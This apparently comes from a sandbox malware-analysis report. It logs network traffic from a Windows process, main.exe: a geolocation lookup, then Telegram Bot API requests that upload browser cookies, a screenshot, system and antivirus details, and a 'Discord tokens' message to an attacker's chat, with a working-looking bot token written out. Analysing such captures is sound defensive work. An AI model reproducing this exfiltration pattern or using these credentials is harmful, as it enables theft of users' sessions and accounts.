Sep 2, 2024 16:51:50.187808990 CEST	482	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 14:51:49 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 19 X-Rl: 42 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}
Sep 2, 2024 16:51:50.197112083 CEST	482	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 14:51:49 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 19 X-Rl: 42 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	185.199.108.133	443	7716	C:\ProgramData\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:09 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-09-02 14:50:09 UTC	803	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: 98C8:320503:1B6693:1E0681:66D5D0A1 Accept-Ranges: bytes Date: Mon, 02 Sep 2024 14:50:09 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890087-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1725288609.423650,VS0,VE31 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: ef04b143d043dd955b05bfc31e75cada4c480233 Expires: Mon, 02 Sep 2024 14:55:09 GMT Source-Age: 0
2024-09-02 14:50:09 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.5	56192	185.199.108.133	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:33 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-09-02 14:50:33 UTC	802	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: 98C8:320503:1B6693:1E0681:66D5D0A1 Accept-Ranges: bytes Date: Mon, 02 Sep 2024 14:50:33 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890040-NYC X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1725288633.401634,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: a835bf5dddd5e5923717badded6782204d7fcaaa Expires: Mon, 02 Sep 2024 14:55:33 GMT Source-Age: 24
2024-09-02 14:50:33 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	56193	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:40 UTC	391	OUT	POST /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.28%20kb) HTTP/1.1 Content-Type: multipart/form-data; boundary="ca64f802-3e8f-4ecc-96f4-25fd6e73bf55" Host: api.telegram.org Content-Length: 588 Expect: 100-continue Connection: Keep-Alive
2024-09-02 14:50:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-02 14:50:40 UTC	40	OUT	Data Raw: 2d 2d 63 61 36 34 66 38 30 32 2d 33 65 38 66 2d 34 65 63 63 2d 39 36 66 34 2d 32 35 66 64 36 65 37 33 62 66 35 35 0d 0a Data Ascii: --ca64f802-3e8f-4ecc-96f4-25fd6e73bf55
2024-09-02 14:50:40 UTC	115	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 72 6f 77 73 65 72 20 64 61 74 61 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 42 72 6f 77 73 65 72 25 32 30 64 61 74 61 2e 7a 69 70 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename="Browser data.zip"; filename*=utf-8''Browser%20data.zip
2024-09-02 14:50:40 UTC	389	OUT	Data Raw: 50 4b 03 04 14 00 00 00 08 00 53 56 22 59 24 5e 0f 6f eb 00 00 00 21 01 00 00 1c 00 00 00 63 6f 6f 6b 69 65 73 2f 43 68 72 6f 6d 65 20 5b 44 65 66 61 75 6c 74 5d 2e 74 78 74 7d cc 4b 4e 83 40 00 00 d0 f5 98 f4 28 53 67 98 0f ba 70 01 0a 05 a4 40 cb 2f b0 31 c0 b4 d0 86 96 0c e0 50 39 bd 89 07 f0 1d e0 6d 9e b6 ed 30 b4 fd 69 db 0c 37 90 1c 53 0b 3c 03 db f0 63 0b 60 42 28 a1 af 1a c5 4c e7 88 73 02 70 f4 e5 19 47 a0 21 8d 40 8c 20 a2 10 93 cd bf 01 e3 3a c6 fc 2f d0 91 0e 02 f7 03 30 8c df ac 33 53 91 bd 5b e0 be 2c 06 d6 2d 27 88 92 ce c8 a6 be 7e d4 37 25 b2 72 69 9c bb cc d6 dc 31 52 4c 15 23 fb 00 67 6a 51 07 f9 52 57 c5 b9 d5 a0 6b cc b2 34 33 16 84 3e 1b d5 55 0b 72 57 8e 2b d1 f5 b4 f3 85 33 87 ad 05 67 af 32 fb d4 2c 3c ab fb de 4d 07 21 ef 17 32 Data Ascii: PKSV"Y$^o!cookies/Chrome [Default].txt}KN@(Sgp@/1P9m0i7S<c`B(LspG!@ :/03S[,-'~7%ri1RL#gjQRWk43>UrW+3g2,<M!2
2024-09-02 14:50:40 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 63 61 36 34 66 38 30 32 2d 33 65 38 66 2d 34 65 63 63 2d 39 36 66 34 2d 32 35 66 64 36 65 37 33 62 66 35 35 2d 2d 0d 0a Data Ascii: --ca64f802-3e8f-4ecc-96f4-25fd6e73bf55--
2024-09-02 14:50:40 UTC	962	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:40 GMT Content-Type: application/json Content-Length: 574 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":42067,"from":{"id":7258239318,"is_bot":true,"first_name":"legless3bot","username":"legless3bot"},"chat":{"id":-1002245526003,"title":"\u0432\u0437\u043b\u043e\u043c \u0442\u0435\u0432\u0435","type":"supergroup"},"date":1725288640,"document":{"file_name":"Browser data.zip","mime_type":"application/zip","file_id":"BQACAgQAAyEGAASF2AHzAAKkU2bV0MDGDWstJbKFMgMk8JemHPWvAAIBFwACMPKwUofAJtRAgOtONQQ","file_unique_id":"AgADARcAAjDysFI","file_size":389},"caption":"\ud83d\udcc2 - Browser data\n\u251c\u2500\u2500 \ud83d\udcc2 - cookies(0.28 kb)"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.5	56194	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:41 UTC	164	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:41 GMT Content-Type: application/json Content-Length: 302 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:41 UTC	302	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 32 30 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 35 38 32 33 39 33 31 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 33 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 33 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 34 35 35 32 36 30 30 33 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 33 32 5c 75 30 34 33 37 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 63 20 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 32 5c 75 30 34 33 35 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 Data Ascii: {"ok":true,"result":{"message_id":42068,"from":{"id":7258239318,"is_bot":true,"first_name":"legless3bot","username":"legless3bot"},"chat":{"id":-1002245526003,"title":"\u0432\u0437\u043b\u043e\u043c \u0442\u0435\u0432\u0435","type":"supergroup"},"date":17

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.5	56195	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:42 UTC	525	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20065367%0AUser%20name:%20user%0ASystem%20time:%202024-09-02%2010:50:41%20am%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20654VB%0ARAM:%204095%20MB%0AHWID:%2073CF150472%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:43 GMT Content-Type: application/json Content-Length: 591 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:50:43 UTC	591	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 32 30 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 35 38 32 33 39 33 31 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 33 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 33 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 34 35 35 32 36 30 30 33 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 33 32 5c 75 30 34 33 37 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 63 20 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 32 5c 75 30 34 33 35 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 Data Ascii: {"ok":true,"result":{"message_id":42069,"from":{"id":7258239318,"is_bot":true,"first_name":"legless3bot","username":"legless3bot"},"chat":{"id":-1002245526003,"title":"\u0432\u0437\u043b\u043e\u043c \u0442\u0435\u0432\u0435","type":"supergroup"},"date":17

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.5	56196	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:43 UTC	296	OUT	POST /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20taken HTTP/1.1 Content-Type: multipart/form-data; boundary="208c70bd-783e-4a63-920d-c8fb9fd1ecc9" Host: api.telegram.org Content-Length: 86217 Expect: 100-continue
2024-09-02 14:50:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-02 14:50:44 UTC	40	OUT	Data Raw: 2d 2d 32 30 38 63 37 30 62 64 2d 37 38 33 65 2d 34 61 36 33 2d 39 32 30 64 2d 63 38 66 62 39 66 64 31 65 63 63 39 0d 0a Data Ascii: --208c70bd-783e-4a63-920d-c8fb9fd1ecc9
2024-09-02 14:50:44 UTC	107	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 6a 70 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 6a 70 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=screenshot.jpg; filename*=utf-8''screenshot.jpg
2024-09-02 14:50:44 UTC	16355	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2024-09-02 14:50:44 UTC	16355	OUT	Data Raw: 12 35 50 ec 02 ee 0b c9 6e 4b 74 14 89 1d f6 9b a6 69 d6 1a 84 37 16 d7 ce 9a b5 c7 91 32 14 91 63 fb 19 55 62 a7 91 96 56 c6 7a e0 d6 87 d8 2d fe cb f6 6d 9f ba f4 aa df d8 56 18 c1 8b 3f 5a 89 64 f3 e4 e5 8c b7 56 66 b1 cf a1 cf cf 38 6c dd be 62 d9 2d e8 6b 2d 73 cb 9b fb 26 3d 00 29 bb c6 63 12 0b 53 16 cd dd 37 f9 9f 2e de b9 ed 52 69 61 c6 97 6f bf ef 6c e6 a2 5d 0e c5 58 30 8b 18 ed 5a 0a 02 a8 50 30 00 c0 ae ec 1e 0e 74 26 e5 27 7b e9 f8 b7 fa 9e 6e 61 8f 86 26 31 8c 23 6b 7f 92 5f a0 b4 94 b4 95 e8 9e 58 51 45 14 00 b8 a4 a5 a2 80 1b 46 29 d8 a4 a4 02 51 8a 5a 4c 50 02 51 4b 45 31 89 45 14 53 00 a4 a5 a4 c5 17 01 73 4e 0e 7e bf 5a 65 14 c0 79 d8 dd 46 3e 94 d3 12 9f ba df 9d 26 68 a5 a0 c4 31 b0 ed 9f a5 33 04 76 a9 77 91 4b bc 1f bc 33 45 82 ec Data Ascii: 5PnKti72cUbVz-mV?ZdVf8lb-k-s&=)cS7.Riaol]X0ZP0t&'{na&1#k_XQEF)QZLPQKE1ESsN~ZeyF>&h13vwK3E
2024-09-02 14:50:44 UTC	16355	OUT	Data Raw: 00 ea a6 9c 54 32 90 d2 32 29 be f4 ef f3 8a 69 fc 2a 19 68 4a 43 fa d2 f5 e2 90 d4 b2 84 3d 33 4c 20 d3 cf 4e b4 d2 3d e9 0c 4c 67 8c 7e b4 9f 85 2f eb 49 df e9 52 c6 26 29 3b d2 d1 ce 29 74 1a 3b ce f5 15 cc be 45 bb cb c7 ca 3b d4 b5 1d c4 2b 71 6e f0 b7 dd 71 83 5c ae f6 d0 f9 88 da ea fb 19 ba b6 ae 6d c6 ab 67 6b a7 17 36 12 34 0d 76 d2 b8 91 a4 53 82 42 ee da 17 20 e0 15 27 1d f3 cd 6c 5d 47 1c 5a d5 e5 ad bd cd a3 aa ea 51 d8 88 52 67 66 81 a4 27 cb de 48 c7 38 3d 0b 63 a1 c1 e2 b2 2f a1 bd bb b1 9e de 4b 2b 27 b8 99 02 3d ef ce b2 38 1d d8 06 d8 5b 1c 6e db 9e f9 cf 35 5c db 6b 0b a9 5d 6a 31 a5 a0 b8 ba d4 20 d4 65 04 36 df 32 22 c5 40 f9 be ee 58 e4 75 f7 15 e2 72 e3 60 e2 e3 76 d6 fe 7a af d2 e7 d2 f3 65 b5 23 28 cd a4 9e d6 dd 69 d5 9b 71 1b Data Ascii: T22)i*hJC=3L N=Lg~/IR&);)t;E;+qnq\mgk64vSB 'l]GZQRgf'H8=c/K+'=8[n5\k]j1 e62"@Xur`vze#(iq
2024-09-02 14:50:44 UTC	16355	OUT	Data Raw: d1 a2 8f 65 0b de c3 55 ea da dc ce c6 48 f0 e6 9c bf 76 36 5f 60 d8 ab b6 96 30 59 29 58 43 00 7d 4e 6a cd 14 46 94 22 ee 90 4a bd 49 ab 4a 4d 85 25 2d 15 a1 98 94 51 45 00 14 51 45 00 25 14 b4 94 00 51 45 14 0c 28 a2 8a 00 4a 29 68 a0 04 a4 e6 9d 45 30 12 8e 69 68 a0 04 a4 ef 4b 45 01 70 c5 14 52 1a 00 28 a2 8a 06 25 14 51 40 05 25 2d 14 0c 4a 28 a2 80 12 8a 5a 29 80 94 51 45 20 0a 28 a2 81 89 45 14 50 02 76 a2 96 92 98 c4 a2 96 92 81 85 21 a5 a4 a0 02 8a 28 a6 31 28 a5 a4 a0 02 92 96 8a 06 34 d1 4b 45 00 25 14 77 a2 98 09 45 2d 06 81 89 49 4b 48 68 00 a5 34 94 75 a6 01 41 a2 8a 63 12 92 9d 49 f8 50 31 28 c5 2d 14 00 98 a3 9a 0d 14 00 94 52 9a 4a 00 29 29 68 a6 31 28 a0 d1 4c 02 8a 28 a0 61 dc 56 ed e7 17 3f f0 15 fe 42 b0 87 51 5b f7 a3 17 3f f0 15 fe Data Ascii: eUHv6_`0Y)XC}NjF"JIJM%-QEQE%QE(J)hE0ihKEpR(%Q@%-J(Z)QE (EPv!(1(4KE%wE-IKHh4uAcIP1(-RJ))h1(L(aV?BQ[?
2024-09-02 14:50:44 UTC	16355	OUT	Data Raw: 94 94 1a 0d 05 05 25 29 a6 f6 a0 68 5a 4a 28 a0 04 34 94 b4 94 14 06 92 94 d2 1a 06 25 25 2d 25 03 12 8a 0d 19 a0 61 4d 34 b4 86 81 85 21 34 51 da 81 a1 29 29 69 33 40 01 e9 49 9a 28 a0 a0 3d 29 29 4f 4a 6f 34 0c 53 ef 4d a5 cd 27 6a 06 27 14 1a 3a 9a 28 01 28 1d 78 a2 8a 0a 41 eb 48 69 7f 5a 43 d3 ad 03 12 8c d0 69 09 f7 a0 61 8f f2 68 e9 45 37 b5 30 42 ff 00 3a 4a 5e be 99 a4 27 f5 a4 30 3c 73 48 0f 3e a2 8a 39 c5 31 88 7e b4 71 46 31 47 f2 a0 62 77 a4 e3 14 bd bf 9d 27 14 80 3a 0c d1 d4 9c 75 ef 40 eb 41 ed 4c 62 1e b4 a3 ae 29 3f cf 4a 28 19 e8 94 51 45 66 7c 89 bf e0 ff 00 f9 0f 2f fd 73 6f e9 5e 8b 19 cb 08 cf 2a dc 10 45 79 d7 83 ff 00 e4 3c bf f5 cd bf a5 7a 03 06 71 b5 66 30 b1 e9 20 00 95 f7 e7 8a f8 6c fd b5 98 46 dd 97 e6 cf d0 38 6b fd c1 fa Data Ascii: %)hZJ(4%%-%aM4!4Q))i3@I(=))OJo4SM'j':((xAHiZCiahE70B:J^'0<sH>91~qF1Gbw':u@ALb)?J(QEf\|/so^*Ey<zqf0 lF8k
2024-09-02 14:50:44 UTC	4251	OUT	Data Raw: 74 04 2b 5d 47 c1 ff 00 81 56 30 96 65 42 a4 16 21 5a 2d a5 ad 87 7c 1d 58 cb d8 bb b4 af d4 f0 6a 28 a2 bd c3 84 2b b6 f0 e7 87 22 58 23 b9 bb 88 4b 34 a0 18 e3 23 20 03 d3 8e e4 d7 13 5e e1 e1 bf 2d f5 9b 12 85 47 ca de 4e 7a 6f d8 7c bf fc 7b 6d 72 62 9c 9a 8c 22 ed 76 75 60 71 94 30 b8 98 ca bc 6e ac ed eb d3 fc 87 27 85 75 49 54 44 b6 31 e4 8e 21 69 63 0f ff 00 7c 13 9f d2 b9 2f 15 7c 3e be b7 b1 9b 52 82 c7 c9 10 2e e9 51 59 48 2a 3a 9c 03 da ba 45 37 7f 6f 00 09 7e d7 e6 74 e7 7e fc fe 79 cd 7a 46 ac f0 f9 77 26 e7 69 8b ca fd f7 a7 dd f9 ff 00 ad 73 e7 98 79 64 be ca ad 29 f3 73 3b 34 ff 00 43 d2 c3 e6 f2 cd 63 3a 55 69 a5 6d 9e ba 1f 27 51 45 15 ea 1e 18 57 57 e1 af 0f c5 71 12 df 5e 26 f8 db 3e 5c 67 a1 c7 73 5c a5 7a df 85 4d b3 5b e8 a2 6c 7d Data Ascii: t+]GV0eB!Z-\|Xj(+"X#K4# ^-GNzo\|{mrb"vu`q0n'uITD1!ic\|/\|>R.QYH*:E7o~t~yzFw&isyd)s;4Cc:Uim'QEWWq^&>\gs\zM[l}
2024-09-02 14:50:44 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 32 30 38 63 37 30 62 64 2d 37 38 33 65 2d 34 61 36 33 2d 39 32 30 64 2d 63 38 66 62 39 66 64 31 65 63 63 39 2d 2d 0d 0a Data Ascii: --208c70bd-783e-4a63-920d-c8fb9fd1ecc9--
2024-09-02 14:50:44 UTC	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:44 GMT Content-Type: application/json Content-Length: 898 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":42070,"from":{"id":7258239318,"is_bot":true,"first_name":"legless3bot","username":"legless3bot"},"chat":{"id":-1002245526003,"title":"\u0432\u0437\u043b\u043e\u043c \u0442\u0435\u0432\u0435","type":"supergroup"},"date":1725288644,"document":{"file_name":"screenshot.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADIQYABIXYAfMAAqRWZtXQxFBH_Y2M7CFs-OdoPLkNLsEAAgIXAAIw8rBSvqTF-k6JAroBAAdtAAM1BA","file_unique_id":"AQADAhcAAjDysFJy","file_size":12276,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADIQYABIXYAfMAAqRWZtXQxFBH_Y2M7CFs-OdoPLkNLsEAAgIXAAIw8rBSvqTF-k6JAroBAAdtAAM1BA","file_unique_id":"AQADAhcAAjDysFJy","file_size":12276,"width":320,"height":256},"file_id":"BQACAgQAAyEGAASF2AHzAAKkVmbV0MRQR_2NjOwhbPjnaDy5DS7BAAICFwACMPKwUr6kxfpOiQK6NQQ","file_unique_id":"AgADAhcAAjDysFI","file_size":86026},"caption":"\ud83d\udcf8Screenshot taken"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.5	56197	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:50:45 UTC	360	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20New%20York,%20ID:%204070%0A%E2%84%B9%EF%B8%8FSend%20%22/4070*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:50:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:50:45 GMT Content-Type: application/json Content-Length: 511 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
